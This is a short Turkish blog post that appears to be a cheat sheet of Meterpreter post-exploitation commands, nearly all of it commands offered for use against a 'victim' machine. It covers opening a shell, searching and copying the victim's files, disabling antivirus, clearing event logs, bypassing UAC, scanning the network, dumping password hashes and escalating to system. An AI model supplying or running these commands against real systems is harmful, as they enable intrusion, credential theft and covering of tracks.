Bazı Meterpreter Komutları
Hedef Sistemin Kabuğuna Düşme
execute -f cmd.exe -H -i
shell
Hedef Sistemde Dosya Arama
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf
Hedef Sistemden veri çekme, veri yükleme
upload BackTrackDizinindekiDosya KurbanBilgisayarDizinindekiDosya
download KurbanBilgisayarDizinindekiDosya BackTrackDizinindekiDosya
Makineyi yeniden başlatma
reboot
Antivirüsü kapatma
killav
Not: Bu modül tam olarak çalışmayabilir. Bu sebeple hedef makinenin kabuğuna düşüldükten sonra, önce AV prosesi bulunur. Sonra ilgili servisi bulunarak kapatılır veya disable edilip yeniden başlatılır. Daha sonra da AV prosesi sonlandırılır.
Event logları silme
clearev
UAC atlatma
run post/windows/escalate/bypassuac
Arp taraması ile makine keşfi
run arp_scanner -r 192.168.25.1/24
Parola özetlerini elde etme
hashdump
Ayrıntılı bilgi için bakınız.
Mevcut prosesleri listeleme
ps
Mevcut prosese sıçrama
migrate <Proses_Id>
Bilgisayarda işlem yapılmama vaktini tespit etme
idletime
Meterpreter'ın çalıştığı prosesin kullanıcısını izleme
getuid
Meterpreter'ın çalıştığı prosesin ID değerini izleme
getpid
getsystem
Oturumu kapatmadan Meterpreter'dan MSF'e geçiş
background
background
exit
Hiç yorum yok:
Yorum Gönder